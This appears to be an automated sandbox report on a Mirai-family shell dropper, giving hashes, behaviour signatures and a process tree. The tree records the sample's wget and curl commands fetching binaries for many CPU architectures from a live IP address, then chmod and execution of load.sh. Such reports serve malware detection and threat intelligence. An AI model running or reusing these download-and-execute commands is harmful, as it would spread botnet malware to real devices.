Analysis
- max time kernel: 149s
- max time network: 153s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240611-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 18-10-2024 01:18
Static task
- static1

Behavioral tasks
- behavioral1: sample 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh, resource debian9-armhf-20240729-en
- behavioral3: sample 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh, resource debian9-mipsbe-20240418-en
General
- Target: 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh
- Size: 4KB
- MD5: 80299ebce287b053ec82cff873ddf3b4
- SHA1: 1cf8df1f0b5e0903ac1a103e4acee85a5f0d6e00
- SHA256: 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c
- SHA512: 0f48a97903275e97c681719d763775f5a3817b7d1c40ef475d9e444b1fea5d2f1036237b676ff2d22446f80a9ee882d7f738dbd1f17d8c677082d0a63ffc86f6
- SSDEEP: 96:vNVjNNw4gNx/5NN7lNdMdEpFyNn9/NUssN2mmNRfpN3tnNue2NySqNGWeNPl0:YO4Fs

Malware Config
- Extracted: mirai, UNSTABLE
Signatures
- Contacts a large (211384) amount of remote hosts (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- Creates a large amount of network flows (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- File and Directory Permissions Modification (1 TTPs, 14 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid   process
  1548  chmod
  1554  chmod
  1584  chmod
  1518  chmod
  1524  chmod
  1536  chmod
  1578  chmod
  1505  chmod
  1530  chmod
  1589  chmod
  1560  chmod
  1566  chmod
  1493  chmod
  1511  chmod
- Executes dropped EXE (14 IoCs)
  ioc           pid   process
  /tmp/load.sh  1494  load.sh
  /tmp/load.sh  1506  load.sh
  /tmp/load.sh  1512  load.sh
  /tmp/load.sh  1519  load.sh
  /tmp/load.sh  1525  load.sh
  /tmp/load.sh  1531  load.sh
  /tmp/load.sh  1537  load.sh
  /tmp/load.sh  1549  load.sh
  /tmp/load.sh  1555  load.sh
  /tmp/load.sh  1561  load.sh
  /tmp/load.sh  1567  load.sh
  /tmp/load.sh  1579  load.sh
  /tmp/load.sh  1585  load.sh
  /tmp/load.sh  1590  load.sh
- Modifies Watchdog functionality (1 TTPs, 4 IoCs)
  Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description                   ioc                 process
  File opened for modification  /dev/watchdog       load.sh
  File opened for modification  /dev/misc/watchdog  load.sh
  File opened for modification  /dev/watchdog       load.sh
  File opened for modification  /dev/misc/watchdog  load.sh
- Enumerates active TCP sockets (1 TTPs, 1 IoCs)
  Gets active TCP sockets from /proc virtual filesystem.
  description              ioc            process
  File opened for reading  /proc/net/tcp  load.sh
- Enumerates running processes
  Discovers information about currently running processes on the system.
- Writes file to system bin folder (4 IoCs)
  description                   ioc             process
  File opened for modification  /bin/watchdog   load.sh
  File opened for modification  /sbin/watchdog  load.sh
  File opened for modification  /bin/watchdog   load.sh
  File opened for modification  /sbin/watchdog  load.sh
- YARA matches on dropped files
  resource                         yara_rule
  behavioral1/files/fstream-1.dat  upx
  behavioral1/files/fstream-4.dat  upx
  behavioral1/files/fstream-5.dat  upx
  behavioral1/files/fstream-6.dat  upx
  behavioral1/files/fstream-7.dat  upx
- Changes its process name (2 IoCs)
  description                                                       ioc  pid   process
  Changes the process name, possibly in an attempt to hide itself  a    1494  load.sh
  Changes the process name, possibly in an attempt to hide itself  a    1567  load.sh
- Reads system network configuration (1 TTPs, 1 IoCs)
  Uses contents of /proc filesystem to enumerate network settings.
  description              ioc            process
  File opened for reading  /proc/net/tcp  load.sh
- System Network Configuration Discovery (1 TTPs, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid   process
  1496  wget
  1503  curl
  1504  cat
- Writes file to tmp directory (28 IoCs)
  Malware often drops required files in the /tmp directory.
  description                   ioc                                            process
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm6    curl
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.x86     wget
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.mips    curl
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm5    curl
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm     curl
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm5    wget
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm7    curl
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.ppc     curl
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.i686    wget
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.sh4     curl
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.x86     curl
  File opened for modification  /tmp/load.sh                                  220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.mips    wget
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.mpsl    curl
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.ppc     wget
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.i686    curl
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.mpsl    wget
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.spc     curl
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.sh4     wget
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm     wget
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm6    wget
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm7    wget
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.m68k    wget
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.x86_64  curl
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.m68k    curl
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.spc     wget
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.arc     curl
  File opened for modification  /tmp/db0fa4b8db0333367e9bda3ab68b8042.arc     wget
Processes
- /tmp/220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh: /tmp/220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh (PID 1478)
  - Writes file to tmp directory
  - /usr/bin/wget: wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86 (PID 1481)
    - Writes file to tmp directory
  - /usr/bin/curl: curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86 (PID 1491)
    - Writes file to tmp directory
  - /bin/cat: cat db0fa4b8db0333367e9bda3ab68b8042.x86 (PID 1492)
  - /bin/chmod: chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1 (PID 1493)
    - File and Directory Permissions Modification
  - /tmp/load.sh: ./load.sh thinkphp.exploit (PID 1494)
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Writes file to system bin folder
    - Changes its process name
    - Reads runtime system information
  - /usr/bin/wget: wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips (PID 1496)
    - System Network Configuration Discovery
    - Writes file to tmp directory
  - /usr/bin/curl: curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips (PID 1503)
    - System Network Configuration Discovery
    - Writes file to tmp directory
  - /bin/cat: cat db0fa4b8db0333367e9bda3ab68b8042.mips (PID 1504)
    - System Network Configuration Discovery
  - /bin/chmod: chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1 (PID 1505)
    - File and Directory Permissions Modification
  - /tmp/load.sh: ./load.sh thinkphp.exploit (PID 1506)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl (PID 1508)
    - Writes file to tmp directory
  - /usr/bin/curl: curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl (PID 1509)
    - Writes file to tmp directory
  - /bin/cat: cat db0fa4b8db0333367e9bda3ab68b8042.mpsl (PID 1510)
  - /bin/chmod: chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1 (PID 1511)
    - File and Directory Permissions Modification
  - /tmp/load.sh: ./load.sh thinkphp.exploit (PID 1512)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm (PID 1514)
    - Writes file to tmp directory
  - /usr/bin/curl: curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm (PID 1516)
    - Writes file to tmp directory
  - /bin/cat: cat db0fa4b8db0333367e9bda3ab68b8042.arm (PID 1517)
  - /bin/chmod: chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1 (PID 1518)
    - File and Directory Permissions Modification
  - /tmp/load.sh: ./load.sh thinkphp.exploit (PID 1519)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5 (PID 1521)
    - Writes file to tmp directory
  - /usr/bin/curl: curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5 (PID 1522)
    - Writes file to tmp directory
  - /bin/cat: cat db0fa4b8db0333367e9bda3ab68b8042.arm5 (PID 1523)
  - /bin/chmod: chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1 (PID 1524)
    - File and Directory Permissions Modification
  - /tmp/load.sh: ./load.sh thinkphp.exploit (PID 1525)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6 (PID 1527)
    - Writes file to tmp directory
  - /usr/bin/curl: curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6 (PID 1528)
    - Writes file to tmp directory
  - /bin/cat: cat db0fa4b8db0333367e9bda3ab68b8042.arm6 (PID 1529)
  - /bin/chmod: chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1 (PID 1530)
    - File and Directory Permissions Modification
  - /tmp/load.sh: ./load.sh thinkphp.exploit (PID 1531)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7 (PID 1533)
    - Writes file to tmp directory
  - /usr/bin/curl: curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7 (PID 1534)
    - Writes file to tmp directory
  - /bin/cat: cat db0fa4b8db0333367e9bda3ab68b8042.arm7 (PID 1535)
  - /bin/chmod: chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1 (PID 1536)
    - File and Directory Permissions Modification
  - /tmp/load.sh: ./load.sh thinkphp.exploit (PID 1537)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc (PID 1539)
    - Writes file to tmp directory
  - /usr/bin/curl: curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc (PID 1546)
    - Writes file to tmp directory
  - /bin/cat: cat db0fa4b8db0333367e9bda3ab68b8042.ppc (PID 1547)
  - /bin/chmod: chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1 (PID 1548)
    - File and Directory Permissions Modification
  - /tmp/load.sh: ./load.sh thinkphp.exploit (PID 1549)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k (PID 1551)
    - Writes file to tmp directory
  - /usr/bin/curl: curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k (PID 1552)
    - Writes file to tmp directory
  - /bin/cat: cat db0fa4b8db0333367e9bda3ab68b8042.m68k (PID 1553)
  - /bin/chmod: chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1 (PID 1554)
    - File and Directory Permissions Modification
  - /tmp/load.sh: ./load.sh thinkphp.exploit (PID 1555)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc (PID 1557)
    - Writes file to tmp directory
  - /usr/bin/curl: curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc (PID 1558)
    - Writes file to tmp directory
  - /bin/cat: cat db0fa4b8db0333367e9bda3ab68b8042.spc (PID 1559)
  - /bin/chmod: chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1 (PID 1560)
    - File and Directory Permissions Modification
  - /tmp/load.sh: ./load.sh thinkphp.exploit (PID 1561)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686 (PID 1563)
    - Writes file to tmp directory
  - /usr/bin/curl: curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686 (PID 1564)
    - Writes file to tmp directory
  - /bin/cat: cat db0fa4b8db0333367e9bda3ab68b8042.i686 (PID 1565)
  - /bin/chmod: chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.i686 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1 (PID 1566)
    - File and Directory Permissions Modification
  - /tmp/load.sh: ./load.sh thinkphp.exploit (PID 1567)
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Enumerates active TCP sockets
    - Writes file to system bin folder
    - Changes its process name
    - Reads system network configuration
    - Reads runtime system information
  - /usr/bin/wget: wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4 (PID 1569)
    - Writes file to tmp directory
  - /usr/bin/curl: curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4 (PID 1576)
    - Writes file to tmp directory
  - /bin/cat: cat db0fa4b8db0333367e9bda3ab68b8042.sh4 (PID 1577)
  - /bin/chmod: chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.i686 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.sh4 db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1 (PID 1578)
    - File and Directory Permissions Modification
  - /tmp/load.sh: ./load.sh thinkphp.exploit (PID 1579)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86_64 (PID 1581)
  - /usr/bin/curl: curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86_64 (PID 1582)
    - Writes file to tmp directory
  - /bin/cat: cat db0fa4b8db0333367e9bda3ab68b8042.x86_64 (PID 1583)
  - /bin/chmod: chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.i686 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.sh4 db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 db0fa4b8db0333367e9bda3ab68b8042.x86_64 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1 (PID 1584)
    - File and Directory Permissions Modification
  - /tmp/load.sh: ./load.sh thinkphp.exploit (PID 1585)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc (PID 1586)
    - Writes file to tmp directory
  - /usr/bin/curl: curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc (PID 1587)
    - Writes file to tmp directory
  - /bin/cat: cat db0fa4b8db0333367e9bda3ab68b8042.arc (PID 1588)
  - /bin/chmod: chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arc db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.i686 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.sh4 db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 db0fa4b8db0333367e9bda3ab68b8042.x86_64 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1 (PID 1589)
    - File and Directory Permissions Modification
